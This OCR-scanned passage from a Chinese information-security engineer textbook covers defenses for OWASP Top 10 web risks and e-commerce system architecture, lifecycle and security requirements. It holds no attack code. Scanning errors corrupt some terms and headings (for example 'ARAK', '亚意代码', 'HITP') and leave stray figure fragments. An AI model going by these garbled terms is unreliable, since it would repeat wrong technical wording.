。 “ 白 名 单 ” 的 ， 具 有 恰当 的 规范 化 和 解码 功能 的 输入 验证 方法 同样 会 有 助 于 防止 
跨 站 脚本 。 但 由 于 很 多 应 用 程序 在 输入 中 需要 特殊 字符 ， 这 一 方法 不 是 完整 的 防 
护 方 法 。 这 种 验证 方法 需要 尽 可 能 地 解码 任何 编码 输入 ， 同 时 在 接受 输入 之 前 需 
要 充分 验证 数据 的 长 度 、 字 符 、 格 式 和 任何 商务 规则 。 

。 用 内 容 安全 策略 (CSP) 来 抵御 整个 网 站 的 跨 站 脚本 攻击 。 

。 用 户 学 会 控制 自己 的 好 奇 心 ， 尽 量 不 去 单 击 页 面 中 不 安全 的 链接 。 


8.1.2.4 ”不 安全 的 直接 对 象 引 用 


。 用 户 或 者 会 话 的 间接 对 象 引 用 。 这 样 能 防止 攻击 者 直接 攻击 未 授权 资源 。 例 如 ， 
一 个 下 拉 列 表 包 含 6 个 授权 给 当前 用 户 的 资源 ， 它 可 以 使 用 数字 1~6 来 指示 哪个 
是 用 户 选择 的 值 ， 而 不 是 使 用 资源 的 数据 库 关 键 字 来 表示 。 在 服务 器 端 ， 应 用 程 
序 需要 将 每 个 用 户 的 间接 引用 映射 到 实际 的 数据 库 关 键 字 。OWASP 的 ESAPI 包 
含 了 两 种 序列 和 随机 访问 引用 映射 ， 开 发 人 员 可 以 用 来 消除 直接 对 象 引用 。 
检查 访问 。 任 何 来 自 不 可 信 源 的 直接 对 象 引 用 都 必须 通过 访问 控制 检测 ， 确 保 该 
用 户 对 请 求 的 对 象 有 访问 权限 。 

。 避免 在 URL 或 页 面 中 直接 引用 内 部 数据 库 关键 字 或 者 是 文件 名 。 

。 锁定 网 站 服务 器 上 的 所 有 目录 和 文件 来， 设置 访问 权限 。 


8.1.2.5 ”安全 配置 错误 


。 一 个 可 以 快速 且 易 于 部 署 在 另 一 个 锁定 环境 的 可 重复 的 加 固 过 程 。 开 发 、 质 量 保 

证 和 生产 环境 都 应 该 配置 相同 〈 每 个 环境 中 使 用 不 同 的 密码 )。 这 个 过 程 应 该 是 

自动 化 的 ， 以 尽量 减少 安装 一 个 新 安全 环境 的 耗费 。 

一 个 能 及 时 了 解 并 部 署 每 个 已 部 署 环境 的 所 有 最 新 软件 更 新 和 补丁 的 过 程 。 这 需 

要 包括 通常 被 忽略 的 所 有 代码 的 库 文件 。 

。 一 个 能 在 组 件 之 间 提供 有 效 的 分 离 和 安全 性 的 强大 应 用 程序 架构 。 

。 实施 漏洞 扫描 和 经 常 进行 审计 以 帮助 检测 将 来 可 能 的 错误 配置 或 没有 安装 的 
补丁 。 


8.1.2.6 ”敏感 信息 泄露 


。 预测 一 些 威胁 (比如 内 部 攻击 和 外 部 用 户 )， 加 密 这 些 数据 的 存储 以 确保 免 受 这 
。 对 于 没 必要 存放 的 、 重 要 的 敏感 数据 ， 应 当 尽快 清除 。 
。 确保 使 用 了 合适 的 强大 的 标准 算法 和 强大 的 密 匙 ， 并 且 密 钥 管理 到 位 。 
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。 确保 使 用 密码 专用 算法 存储 密码 ， 如 : bcrypt、PBKDF2 或 者 scrypt。 
。 禁用 自动 完成 防止 敏感 数据 收集 ， 禁 用 包含 敏感 数据 的 缓存 页 面 。 
8.1.2.7 ”功能 级 访问 控制 缺失 
。 考虑 一 下 管理 权利 的 过 程 并 确保 能 够 容易 的 进行 升级 和 审计 。 切 鼠 硬 编码 。 
。 执行 机 制 在 缺 省 情况 下 ， 应 该 拒绝 所 有 访问 。 对 于 每 个 功能 的 访问 ， 需 要 明确 授 


予 特定 角色 的 访问 权限 。 
。 如 果菜 个 功能 参与 了 工作 流程 ,检查 并 确保 当前 的 条 件 是 授权 访问 此 功能 的 合适 


8.1.2.8 ” 跨 站 请 求 伪 造 (CSRF) 
防止 跨 站 请 求 伪造 ， 通 常 需要 在 每 个 HITP 请 求 中 添加 一 个 不 可 预测 的 令 牌 。 这 种 
令 牌 至 少 应 该 对 每 一 个 用 户 会 话 来 说 是 唯一 的 。 
。 最 好 的 方法 是 将 独 有 的 令 牌 包含 在 一 个 隐藏 字段 中 。 这 将 使 得 该 令 牌 通过 HTTP 
请 求 体 发 送 ， 避 免 其 包含 在 URL 中 从 而 被 暴露 出 来 。 
© 该 独 有 令 牌 同样 可 以 包含 在 URL 中 或 作为 一 个 URL 参数 。 但 是 这 种 方法 的 巨大 
风险 在 于 : URL 会 暴露 给 攻击 者 ， 这 样 秘密 令 牌 也 会 被 泄漏 。 
。 要 求 用 户 重新 认证 或 者 判明 他 们 是 一 个 真实 的 用 户 (例如 通过 CAPTCHA ) 也 可 
以 防护 CSRF 攻击 。 
8.1.2.9 ”使 用 更 含有 已 知 漏洞 的 组 件 
软件 项 目 应 该 有 如 下 的 流程 : 
。 标识 您 正在 使 用 的 所 有 组 件 及 其 版 本 ， 包 括 所 有 的 组 件 〈 比 如 版 本 插件 )。 
。 在 公共 数据 库 ， 项 目 邮 件 列表 和 安全 邮件 列表 中 时 刻 关注 这 些 组 件 的 安全 信息 并 
保证 它们 是 最 新 的 。 
。 建立 组 件 使 用 的 安全 策略 ， 比 如 需要 某 些 软件 开发 实践 ， 通 过 安全 性 测试 和 可 以 
接受 的 授权 许可 。 
。 在 适当 的 情况 下 , 考虑 增加 对 组 件 的 安全 封装 ， 去 掉 不 使 用 的 功能 和 /或 安全 薄弱 
的 或 者 组 件 易 受 攻击 的 方面 。 
8.1.2.10 ”未 验证 的 重 定 向 和 转发 
重 定向 和 转发 的 安全 使 用 可 以 有 多 种 方式 完成 : 
。 避免 使 用 重 定向 和 转发 。 
。 如 果 使 用 了 重 定向 和 转发 ， 则 不 要 在 计算 目标 时 涉及 到 用 户 参数 。 这 通常 容易 


做 到 。 
。 如 果 使 用 目标 参数 无 法 避免 ， 应 确保 其 所 提供 的 值 于 当前 用 户 是 有 效 的 ， 并 已 经 
授权 。 


建议 把 这 种 目标 的 参数 做 成 一 个 映射 值 ， 而 不 是 真 的 URL 或 其 中 的 一 部 分 ， 然 后 
由 服务 器 端 代码 将 映射 值 转换 成 目标 URL. 
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8.2 ”电子 商务 安全 的 需求 分 析 与 基本 设计 


随 着 信息 化 技术 的 不 断 发 展 ， 网 络 带宽 速度 的 不 断 提 高 ， 移 动 互联 网 的 不 断 普及 ， 
以 及 电子 商务 模式 的 不 断 升级 ， 网 络 购物 已 经 成 为 人 们 日 常生 活 中 必 不 可 少 的 一 部 分 。 
淘宝 网 、 京 东 网 、 当 当 网 、 携 程 、12306、 去 哪儿 网 等 一 大 批 综合 类 及 领域 类 电子 商务 网 
站 鞍 勃 发 展 ， 线 上 线 下 互动 频繁 ， 对 传统 商业 模式 带 来 比较 大 的 冲击 ， 改 变 人 们 日 常 的 
生产 与 生活 方式 。 

随 着 电子 商务 的 不 断 发 展 ， 对 电子 商务 系统 安全 性 、 可 靠 性 的 要 求 不 断 提 高 ， 电 子 
商务 安全 已 经 成 为 国家 信息 化 基础 设施 安全 不 可 或 缺 的 一 部 分 。 本 节 针 对 电子 商务 安全 
的 需求 分 析 与 基本 设计 进行 介绍 ， 包 括 电子 商务 系统 的 基本 情况 、 电 子 商 务 系统 的 典型 
架构 、 电 子 商务 系统 安全 的 需求 分 析 、 电 子 商 务 系统 安全 架构 以 及 电子 商务 系统 安全 实 
践 等 内 容 。 


8.2.1 电子 商务 系统 概述 


电子 商务 系统 具有 广义 和 狭义 之 分 。 广 义 上 的 电子 商务 系统 是 支持 商务 活动 的 电子 
技术 手段 的 集合 。 而 从 狭义 上 看 ， 针 对 企业 而 言 ， 电 子 商 务 系统 是 指 在 互联 网 的 基础 上 ， 
以 实现 企业 电子 商务 活动 为 目标 ， 满 足 企业 生产 、 销 售 、 服 务 等 生产 和 管理 的 需要 ， 支 
持 企业 的 对 外 业务 协作 ， 从 运作 、 管 理 和 决策 等 层次 全 面 提高 企业 信息 化 水 平 ， 为 企业 
提供 商业 智能 的 计算 机 系统 ;针对 用 户 而 言 ， 电 子 商 务 系统 是 通过 互联 网 可 以 方便 快捷 
实现 商品 采购 的 服务 平台 或 门户 网 站 。 因 此 ， 电 子 商务 系统 实际 上 是 覆盖 生产 者 、 消 费 
者 、 商 务 中 介 、 合 作 伙伴 等 多 方 需求 的 各 类 信息 系统 的 总 和 ， 涵 盖 企 业内 部 的 信息 管理 
系统 MIS、 生 产 制 造 系统 (MES )、 企 业 资源 规划 〈ERP)、 供 应 链 管理 (SCM)、 客 户 
管理 (CRM)、 门 户 网 站 、 电 子 支付 与 结算 平台 以 及 其 他 各 类 组 件 与 接口 。 

电子 商务 系统 是 支撑 企业 商务 活动 的 技术 平台 ， 这 一 平台 与 传统 的 管理 信息 系统 、 
决策 支持 系统 等 信息 系统 既 有 联系 又 有 所 不 同 ， 电 子 商务 系统 具有 自身 的 特点 : 

1. 电子 商务 系统 是 支撑 企业 自身 运营 的 基础 平台 

企业 的 电子 商务 系统 包含 了 企业 内 部 生产 、 规 划 、 经 营 、 管 理 等 众多 信息 系统 ， 每 
一 个 信息 系统 都 为 企业 电子 商务 系统 提供 信息 支持 。 电 子 商 务 系统 是 企业 信息 化 的 基础 
设施 ， 也 是 企业 在 信息 化 实现 经 营 、 管 理 、 运 维 的 重要 手段 ， 在 企业 自身 发 展 过 程 中 具 
有 极其 重要 的 地 位 。 

2. 电子 商务 系统 是 优化 企业 业务 流程 、 降 低 经 营 成 本 的 重要 手段 

电子 商务 系统 是 实现 现代 企业 管理 的 重要 途径 ， 企 业 利用 电子 商务 平台 的 “商务 整 
合 ” 完 成 企业 业务 流程 的 再 造 ， 充 分 发 挥 企业 信息 资源 ， 降 低 企业 经 营 成 本 ， 提 升 企业 
的 竞争 优势 。 一 个 企业 的 电子 商务 系统 , 其 优 劣 与 否 直接 关系 到 企业 在 生态 圈 内 的 发 展 ， 
对 于 企业 而 言 具有 极其 重要 的 战略 意义 。 
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3. 电子 商务 系统 对 实时 性 、 安 全 性 与 可 靠 性 要 求 较 高 

电子 商务 系统 直接 处 理 企业 的 核心 信息 资产 ， 包 括 企业 生产 数据 、 经 营 数据 和 企业 
管理 数据 。 对 于 现代 企业 而 言 ， 数 据 就 意味 着 企业 的 资产 。 因 此 ， 企 业 在 信息 保护 与 使 
用 方面 具有 极其 严格 的 管理 规范 要 求 和 安全 防护 要 求 。 另 外 ， 由 于 电子 商务 系统 往往 通 
过 互联 网 直接 与 外 部 相连 ， 存 在 一 定 的 信息 泄露 风险 ， 交 易 数 据 、 电 子 支 付 方式 等 直接 
关系 企业 和 客户 的 资金 安全 ， 因 此 ， 电 子 商 务 系统 的 事务 完整 性 、 安 全 性 与 可 靠 性 对 企 
业 和 客户 而 言 非常 重要 。 

4. 电子 商务 系统 大 多 是 依托 企业 既 有 信息 资源 运行 的 系统 

电子 商务 系统 通过 整合 企业 现 有 信息 资源 ， 提 升 共享 程度 ， 充 分 发 挥 企业 现 有 信息 
资产 的 效益 。 企 业 的 电子 商务 系统 往往 依托 既 有 信息 资源 建立 的 ， 与 企业 既 有 的 信息 系 
统 之 间 在 硬件 、 网 络 资源 、 数 据 、 应 用 之 间 存 在 密切 的 联系 ， 两 者 之 间 通 过 数据 共享 、 
应 用 的 互 操作 形成 紧密 联系 的 整体 。 


8.2.2 ”电子 商务 系统 的 体系 架构 


由 于 电子 商务 系统 往往 是 随 着 企业 发 展 过 程 中 逐步 建立 起 来 的 ， 因 此 电子 商务 系统 
往往 具有 各 个 时 代 信息 系统 的 典型 特征 ， 通 常 是 对 内 通过 企业 信息 总 线 、Web 服务 或 应 
用 程序 接口 API 等 方式 将 各 个 独立 的 系统 连接 起 来 ， 利 用 虚拟 局 域 网 VLAN、 路 由 器 、 
防火 墙 、 交 换 机 等 方式 进行 网 络 域 划分 ， 对 外 通过 Web 方式 提供 统一 的 外 部 服务 接口 。 
典型 的 电子 商务 系统 体系 结构 如 图 8-1 所 示 。 


终端 客户 层 ( Browser 、PDA、Mobile Phone 等 ) 


其 他 
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应 用 
接口 


数据 表达 层 (HTTR WAP 等 ) 


Web 服务 器 


应 用 处 理 层 ( Application 
Server ) 


中 间 件 层 (Transaction 、Session、Communication) 


安全 防护 层 (Firewall 等 ) 


企业 内 部 应 用 数据 库 (DBMS ) 


图 8-1 典型 的 电子 商务 的 逻辑 架构 


EJ 区 


Wah 


信息 安全 工程 师 教程 


从 图 8-1 可 以 看 出 ， 电 子 商务 系统 的 基础 设施 仍然 是 硬件 、 网 络 、 操 作 系统 、 数 据 
库 服 务 器 ， 提 供 业务 运行 的 信息 基础 设施 ， 中 间 件 层 提供 消息 路 由 、 事 务 一 致 性 、 运 行 
容器 、Web 容器 等 业务 运行 环境 ， 终 端 客户 层 提供 业务 的 展现 ， 支 付 接口 与 银行 网 关 接 
口 提供 支付 功能 支持 ， 整 个 系统 是 典型 的 三 要 素 结构 〈 业 务 系统 、 客 户 端 展现 、 第 三 方 
支付 )。 


8.2.3 ”电子 商务 系统 的 设计 开发 的 基本 过 程 


电子 商务 系统 既 可 以 自己 建设 ， 也 可 以 通过 外 包 开 发 ， 或 者 综合 运用 外 包 和 自 建 这 
样 两 种 方式 。 虽 然 电 子 商务 系统 的 功能 各 不 相同 ， 规 模 有 大 有 小 ， 架 构 有 所 区 分 ， 但 是 
电子 商务 系统 的 设计 开发 过 程 是 有 一 定 共性 规律 的 。 

传统 软件 开发 设计 过 程 遵循 典型 的 瀑布 模型 ， 即 需求 分 析 、 概 要 设计 、 详 细 设 计 、 
编码 实现 、 测 试 分 析 、 上 线 运 维 等 阶段 ， 这 一 模型 对 于 电子 商务 系统 而 言 同样 适用 。 对 
于 迭代 开发 、 持 续集 成 等 敏捷 软件 开发 模式 而 言 ， 电 子 商务 系统 同样 可 以 借鉴 。 电 子 商 
务 系统 的 生命 周期 可 以 划分 为 立项 规划 、 系 统 设计 、 开 发 集成 、 测 试 评估 、 运 行 维 护 五 
个 阶段 ， 也 可 以 划分 为 商务 模型 的 转变 、 应 用 系统 的 构造 、 系 统 的 运行 和 资源 的 利用 这 
样 四 个 部 分 。 其 中 ， 商 务 模型 转变 对 应 于 系统 立项 规划 、 系 统 分 析 阶 段 ， 而 应 用 系统 的 
构造 包括 系统 设计 、 开 发 集成 等 。 然 而 ， 电 子 商 务 系统 的 规划 阶段 尤其 重要 ， 这 一 阶段 
需要 在 战略 层次 考虑 到 企业 的 商务 模式 如 何 变化 。 即 企业 从 传统 商务 转型 为 电子 商务 的 
目标 必须 与 电子 商务 系统 的 建设 目标 保持 协调 一 致 。 

在 电子 商务 系统 规划 阶段 ， 首 先 需要 确定 企业 未 来 电子 商务 的 运作 模式 ， 这 是 整个 
系统 建造 的 起 点 ， 也 是 电子 商务 系统 设计 、 集 成 的 基本 依据 。 同 时 ， 还 需要 确定 企业 电 
子 商务 系统 的 体系 结构 ， 使 系统 的 开发 人 员 拥有 一 个 可 以 相互 理解 的 共同 基础 ， 同 时 使 
得 后 续 的 系统 设计 、 开 发 工作 有 一 个 非常 明确 的 框架 。 在 该 阶段 中 ， 重 点 关注 如 何 为 企 
业 设 计 出 一 种 新 型 的 价值 链 ， 变 革 企 业 的 商务 流程 ， 将 企业 与 客户 、 合 作 伙伴 紧密 地 连 
接 在 一 起 ， 使 企业 与 合作 伙伴 能 够 共享 知识 ， 形 成 虚拟 的 共同 市 场 。 它 的 关键 是 如 何 转 
变 与 集成 商务 过 程 ， 更 好 地 为 客户 服务 。 该 阶段 的 输出 为 : 企业 的 电子 商务 模型 以 及 电 
子 商 务 系统 架构 。 

在 电子 商务 系统 设计 阶段 ， 需 要 在 电子 商务 系统 规划 的 基础 上 ， 确 定 整个 电子 商务 
系统 体系 结构 中 各 个 组 成 部 分 ， 重 点 是 确定 电子 商务 业务 系统 的 功能 、 平 台 的 基本 功能 
和 系统 平台 的 构成 ， 例 如 应 用 逻辑 是 什么 ， 应 用 开发 的 基础 平台 是 什么 ， 系 统 之 问 的 接 
口 是 什 么 ， 采 用 什么 样 的 架构 设计 等 。 通 过 确定 体系 结构 中 的 组 件 及 接口 ， 为 系统 的 开 
发 集成 商定 基础 。 系 统 设计 阶段 的 输出 是 确定 电子 商务 系统 的 逻辑 结构 和 应 用 功能 。 

在 电子 商务 系统 开发 与 集成 阶段 ， 根 据 电子 商务 系统 规划 以 及 系统 逻辑 结构 设计 ， 
确定 需要 哪些 产品 或 者 技术 来 构筑 电子 商务 系统 的 平台 ， 并 完成 应 用 软件 系统 的 编码 ， 
最 终 将 电子 商务 系统 的 应 用 软件 和 各 种 平台 集成 在 一 起 。 在 开发 阶段 时 需要 尽 可 能 地 利 
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用 快速 原型 法 构造 电子 商务 系统 的 原型 系统 ， 以 便 与 客户 在 直观 的 界面 前 应 用 ， 充 分 地 
为 应 用 并 发 事务 处 理 能 力 做 好 充足 的 考虑 。 在 开发 应 用 的 同时 , 还 需 依据 各 类 技术 标准 ， 
选择 满足 需要 的 产品 搭建 应 用 软件 运行 的 环境 。 在 系统 集成 时 ， 需 要 将 应 用 软件 、 运 行 
环境 以 及 企业 内 部 信息 系统 、 外 部 信息 系统 等 整合 为 一 个 共享 资源 的 信息 平台 ， 不 仅 包 
括 网 络 系统 的 连通 、 应 用 之 间 的 互 操作 ， 还 需 完成 企业 商务 过 程 和 电子 商务 系统 整合 
过 程 。 

在 电子 商务 系统 测试 评估 阶段 ， 需 要 测试 系统 是 否 满足 企业 电子 商务 运作 的 基本 要 
求 ， 测 试 并 分 析 系 统 的 主要 性 能 指标 ， 优 化 系统 的 性 能 ， 提 高 系统 的 效率 。 系 统 测试 是 
为 了 检查 系统 的 功能 是 否 满足 设计 的 需要 , 判定 应 用 软件 是 否 存在 各 种 程度 错误 或 漏洞 
测试 的 内 容 包 括 对 白 盒 测试 、 黑 盒 测 试 、 压 力 测试 、 性 能 测试 、 并 发 测试 、 可 操作 性 测 
试 、 安 全 测试 等 。 电 子 商 务 系统 评估 是 根据 系统 测试 的 结果 对 系统 性 能 进行 的 评价 。 评 
估 过 程 对 电子 商务 系统 的 整个 生命 周期 是 非常 重要 的 ， 系 统 评估 的 结果 能 够 证 实 系统 能 
否 满足 设计 的 要 求 ， 能 否 投入 到 企业 的 商务 应 用 中 。 同 时 ， 从 评估 的 结果 中 能 够 发 现 影 
响 系 统 性 能 的 瓶颈 在 哪里 ， 这 些 结论 有 助 于 进一步 完成 对 系统 性 能 的 改善 。 

在 电子 商务 系统 运行 维护 阶段 ， 企 业 商 务 活动 依靠 该 电子 商务 系统 在 新 的 模式 下 运 
转 ， 这 种 运行 不 仅 包括 电子 商务 系统 的 正常 运转 、 维 护 和 管理 ， 同 时 企业 基于 该 系统 在 
市 场 、 销 售 、 客 户 服务 等 基本 商务 环节 实现 运作 与 组 织 。 如 果 系 统 运行 切换 过 程 不 是 一 
步 到 位 的 ， 必 须 尽量 考虑 好 切换 过 程 中 ， 企 业 商 务 流程 可 能 会 在 新 、 旧 系统 中 同时 进行 
一 段 时 间 ， 在 并 行 工 作 期 间 ， 业 务 如 何 处 理 。 此 外 ， 对 于 连续 工作 的 实时 系统 ， 在 切换 
过 程 中 一 定 要 考虑 好 故障 恢复 等 应 急 措施 。 


8.2.4 ”电子 商务 系统 安全 的 需求 分 析 


从 电子 商务 系统 与 一 般 信息 系统 的 共性 与 区 别 我 们 可 以 看 出 ， 电 子 商 务 系统 除了 面 
临 一 般 信 息 系统 所 涉及 的 安全 威胁 之 外 ， 由 于 其 包含 众多 有 关 企业 商业 数据 以 及 电子 支 
付 相关 数据 ， 因 此 它 更 容易 成 为 不 法 分 子 攻击 的 目标 ， 其 安全 性 需求 普 过 高 于 一 般 的 信 
息 系统 。 

传统 的 信息 系统 所 面临 的 威胁 包括 : 硬件 、 操 作 系统 、 网 络 、 中 间 件 、 数 据 库 、 应 
用 程序 、Web 应 用 等 设计 实现 漏洞 、 配 置 错误 等 引发 的 各 种 攻击 ， 包 括 病毒 、 木 马 、 亚 
意 代 码 、SQL 注入 、 跨 站 脚本 、 分 布 式 拒绝 服务 攻击 、 中 间 人 攻击 等 ， 导 致 基础 设施 及 
数据 的 完整 性 、 机 密 性 和 可 用 性 遭受 破坏 。 

在 计算 机 网 络 方面 ， 目 前 互联 网 上 使 用 的 网 络 协议 TCP/IP 本 身 并 非 专 为 安全 通信 
而 设计 ， 所 以 网 络 系统 存在 大 量 安全 隐患 和 威胁 。 网 络 入 侵 者 一 般 会 采用 预 攻击 探测 、 
窃听 等 搜集 目标 的 信息 ， 然 后 利用 拒绝 服务 攻击 或 分 布 式 拒绝 服务 攻击 技术 阻碍 计算 机 
网 络 的 正常 服务 ， 或 使 用 堆栈 溢出 等 远程 网 络 层 漏洞 攻击 手段 进入 被 攻击 的 目标 获得 管 
理 员 权限 ， 并 任意 算 改 数据 。 
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在 操作 系统 方面 ， 由 于 现代 操作 系统 的 代码 庞大 ， 从 而 不 同 程度 上 都 存在 一 些 安全 
漏洞 。 一 些 广泛 应 用 的 操作 系统 ， 如 UNIX、Windows， 其 安全 漏洞 更 是 难以 计数 。 另 
一 方面 ， 系 统管 理 员 或 使 用 人 员 对 复杂 的 操作 系统 和 其 自身 的 安全 防护 技术 了 解 不 够 ， 
配置 不 当 也 会 造成 系统 安全 隐患 。 

在 数据 库 方面 ， 数 据 库 是 信息 和 数据 存放 的 基础 和 平台 ， 但 由 于 其 本 身 过 于 庞大 和 
复杂 ， 存 在 各 种 可 能 的 诸如 用 户 权限 管理 、 文 件 权 限 管理 、 数 据 保密 等 方面 的 安全 隐患 
和 安全 漏洞 ， 所 以 其 安全 问题 也 一 直 是 数据 库 管理 人 员 最 头疼 的 问题 。 

在 应 用 软件 方面 ， 应 用 软件 在 开发 时 的 编程 错误 也 可 能 引致 攻击 。 程 序 错误 有 以 下 
几 种 形式 : 程序 员 忘 记 检查 传送 到 程序 的 入 口 参数 ， 程 序 员 忘 记 检查 边界 条 件 ， 特 别 是 
处 理 字符 串 的 内 存 缓冲 时 ， 程 序 员 忘 记 最 小 特权 的 基本 原则 。 这 些 程序 错误 都 有 可 能 会 
被 黑客 用 到 攻击 计算 机 系统 的 行为 中 。 

通过 上 述 分 析 ， 电 子 商务 系统 的 基础 设施 安全 需求 包括 如 下 方面 : 

(1) 计算 机 硬件 的 安全 性 与 可 靠 性 

计算 机 硬件 是 核心 基础 软件 以 及 上 层 应 用 的 执行 体 ， 它 的 安全 性 与 可 靠 性 直接 关系 
到 整个 电子 商务 系统 的 可 用 性 。 硬 件 的 安全 性 与 可 靠 性 除了 依赖 于 硬件 产品 的 品质 ， 还 
需要 关注 数据 中 心 或 机 房 的 安全 性 ， 例 如 防 雷 、 防 电 、 防 火 、 防 水 、 温 度 控制 、 湿 度 控 
制 、 不 间断 电源 、 元 余 线路 等 ， 通 过 硬件 安全 防护 措施 确保 基础 设施 硬件 的 稳定 可 靠 。 

(2) 计算 机 网 络 的 安全 性 

由 于 电子 商务 系统 往往 通过 互联 网 与 外 部 连接 ， 通 过 局 域 网 与 内 部 信息 系统 连接 ， 
因此 计算 机 网 络 的 安全 性 对 于 电子 商务 系统 而 言 尤 为 重要 。 通 过 防火 墙 、 入 侵 检测 、 防 
病毒 、 防 分 布 式 拒绝 服务 攻击 、 虚 拟 局 域 网 、 虚 拟 专用 网 、 保 又 主机 等 技术 手段 ， 对 网 
络 设置 安全 域 ， 通 过 边界 控制 与 纵深 防御 ， 对 网 络 环境 进行 净化 处 理 。 

(3) 操作 系统 的 安全 性 

操作 系统 是 电子 商务 系统 的 基础 软件 ， 它 的 稳定 可 靠 性 与 安全 性 直接 关系 到 上 层 服 
务 软件 与 应 用 软件 的 安全 性 。 通 过 补丁 升级 、 开 启 安全 策略 、 实 施 安全 加 固 、 实 施 访问 
控制 等 手段 ， 确 保 操作 系统 稳定 可 靠 运行 ， 防 止 攻击 者 通过 系统 漏洞 实施 提前 攻击 。 

(4) 数据 库 的 安全 性 

数据 库 是 企业 各 类 数据 的 集中 存储 地 ， 也 是 企业 的 核心 资产 ， 数 据 的 安全 性 直接 关 
系 到 企业 的 生存 。 通 过 合理 规划 数据 库 模 式 、 实 施 访问 控制 机 制 、 落 实数 据 连续 性 策略 、 
数据 库 安全 加 固 等 手段 ， 确 保 数 据 库 自身 及 数据 库 中 数据 的 机 密 性 、 完 整 性 和 可 用 性 。 

(5) 应 用 软件 的 安全 性 

应 用 软件 是 电子 商务 系统 业务 逻辑 的 核心 ， 也 是 电子 商务 系统 中 最 为 关键 的 一 环 。 
通常 而 言 ， 应 用 软件 由 于 开发 人 员 技 术 水 平 、 开 发 周期 约束 、 编 程 语言 自身 漏洞 、 协 议 
漏洞 等 因素 ， 往 往 成 为 最 容易 攻击 和 渗透 的 脆弱 点 ， 因 此 ， 通 过 代码 静态 与 动态 分 析 、 
安全 编码 、 最 佳 编程 实践 等 方式 ， 提 升 代码 质量 ， 预 防 常见 安全 漏洞 。 
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电子 商务 系统 在 一 般 信 息 系统 面临 的 威胁 之 外 ， 更 需要 关注 电子 交易 的 安全 。 电 子 
交易 的 安全 则 是 指 通过 一 系列 的 措施 保证 交易 过 程 的 真实 可 靠 、 完 整 、 不 可 否认 和 机 密 。 
与 基础 设施 安全 相 比 ， 电 子 交 易 安 全 更 侧重 于 交易 过 程 。 

电子 交易 普遍 存在 着 以 下 安全 隐患 : 

CL) 信息 窃取 

当 数据 信息 在 网 络 上 以 明文 形式 或 弱 加 密 形 式 传送 时 ， 攻 击 者 可 以 在 数据 包 经 过 的 
网 关 或 路 由 器 上 截获 传送 的 信息 。 通 过 多 次 从 取 和 分 析 ， 可 以 找到 信息 的 规律 和 格式 ， 
进而 得 到 传输 信息 的 内 容 ， 造 成 网 上 传输 的 交易 信息 的 泄密 。 

(2) ARAK 

当 攻击 者 掌握 了 信息 的 格式 和 规律 后 ， 通 过 各 种 技术 手段 和 方法 ， 将 网 络 上 传送 的 
信息 数据 在 中 途 修改 ， 然 后 再 发 向 目的 地 。 

(3) 身份 假冒 

当 攻 击 者 掌握 了 网 上 交易 数据 的 格式 后 ， 就 可 以 算 改 通过 的 信息 ， 攻 击 者 可 以 冒充 
合法 用 户 发 送 假 冒 的 信息 或 者 主动 获取 信息 。 

(4) 交易 的 否认 

由 于 商情 的 千变万化 ， 交 易 一 旦 达成 是 不 能 被 否认 的 ; 否则 必然 会 损害 交易 一 方 的 
利益 。 

通过 上 述 分 析 ， 电 子 商 务 系统 中 的 电子 交易 安全 需求 包括 以 下 几 个 方面 。 

(1) 交易 的 真实 性 

所 谓 交 易 的 真实 性 是 指 交易 开始 前 ， 买 卖 双 方 能 够 辨别 对 方 的 身份 是 真实 的 。 由 于 
电子 商务 在 网 络 上 进行 ， 买 卖 双方 实际 上 都 是 在 和 虚拟 的 对 手 进行 交易 ， 该 过 程 存在 的 
潜在 风险 是 ;对方 的 真实 身份 是 否 与 其 在 网 络 上 声称 的 一 致 ， 是 否 存在 诈骗 的 可 能 。 网 
络 上 进行 电子 商务 的 买卖 双方 可 能 远 隔 千里 、 甚 至 跨越 国境 ， 在 这 种 情况 下 辨别 交易 对 
方 的 真实 性 就 显得 尤为 重要 。 

交易 的 真实 性 涉及 到 电子 商务 系统 中 的 认证 。 认 证 实际 上 类 似 于 传统 交易 中 的 “中 
人 ”或 者 “ 保 人 ”, 交易 的 双方 都 可 能 对 对 方 不 信任 , 但 是 只 要 他 们 都 信任 证 书 中 心 CA， 
而 CA 证 实 双方 的 身份 ， 那 么 买卖 双方 就 可 以 取得 彼此 的 信任 。 同 时 ， 认 证 不 是 没有 依 
据 的 ， 需 要 一 定 的 证 据 加 以 证 明 ， 电 子 交易 过 程 中 的 这 种 证 据 就 是 一 些 信 息 〈 例 如 密码 、 
电子 签名 等 ) 。 

(2) 交易 的 完整 性 

交易 的 完整 性 则 是 指 交易 数据 在 传输 过 程 中 不 会 被 恶意 或 意外 地 改变 、 毁 坏 。 交 易 
的 保密 性 尽管 能 够 保证 交易 数据 传输 中 不 被 窃取 ， 但 是 不 能 保证 传输 中 可 能 发 生 某 种 意 
外 或 者 非 授权 情况 下 的 破坏 ， 同 时 也 难以 保证 数据 传输 的 顺序 统一 。 而 完整 性 对 交易 中 
的 敏感 数据 是 非常 重要 的 , 例如 扣 款 过 程 中 扣 款 需要 在 交易 双方 的 资金 账户 上 进行 操作 
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如 果 交 易 不 完整 而 只 在 一 方 账户 上 进行 了 操作 ， 那 么 结果 是 难以 预料 的 。 

(3) 交易 的 保密 性 

交易 的 保密 性 也 称 为 交易 的 隐私 性 ， 是 指 交易 双方 的 信息 在 网 络 传输 或 者 存储 中 不 
被 他 人 窃取 。 传 统 的 交易 活动 中 ， 敏 感性 的 数据 例如 商务 合同 、 信 用 卡号 码 、 交 易 机 密 
等 可 以 通过 文件 的 封装 或 者 可 靠 途径 传递 ， 以 此 来 保证 数据 的 安全 。 而 在 开放 的 互联 网 
上 ， 由 于 TCP/IP 协议 采用 卫 报 文 交换 的 方式 ， 因 而 存在 数据 被 窃取 的 可 能 。 所 以 ， 电 
子 交 易 过 程 中 保证 交易 数据 的 隐秘 ， 就 显得 尤为 重要 。 

电子 商务 交易 的 保密 性 主要 通过 “数据 不 被 窃取 、 窃 取 不 被 破译 ”的 思路 来 保证 的 。 
具体 而 言 ， “数据 不 被 窃取 ”是 通过 像 防火 墙 、IPSec 等 手段 实现 ， 而 “窃取 不 被 破译 ” 
则 主要 利用 了 各 种 数据 加 密 手 段 ， 例 如 DES、RSA 等 。 

(4) 交易 的 不 可 抵赖 性 

不 可 抵赖 性 也 称 为 不 可 否认 性 ， 主 要 指 交易 双方 不 能 否认 彼此 之 问 的 信息 交流 。 传 
统 的 交易 过 程 中 ， 尽 管 双方 可 能 不 见面 ， 例 如 邮购 过 程 是 很 难 抵赖 的 ， 因 为 有 足够 的 证 
